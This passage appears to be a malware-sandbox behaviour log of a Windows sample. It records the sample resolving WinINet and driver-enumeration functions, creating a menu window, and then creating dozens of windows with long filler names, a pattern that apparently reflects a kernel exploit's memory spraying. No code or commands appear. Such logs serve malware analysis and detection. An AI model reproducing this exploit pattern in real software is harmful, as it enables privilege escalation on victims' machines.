Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x74979fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x74922460 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x749211e0 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x773d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x773d1380 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x773d13e0 True 1
Fn
Thread 0xf04
257 0
»
Category Operation Information Success Count Logfile
Window Create class_name = #32768, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = #32768, index = 18446744073709551600, new_long = 1153433600 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
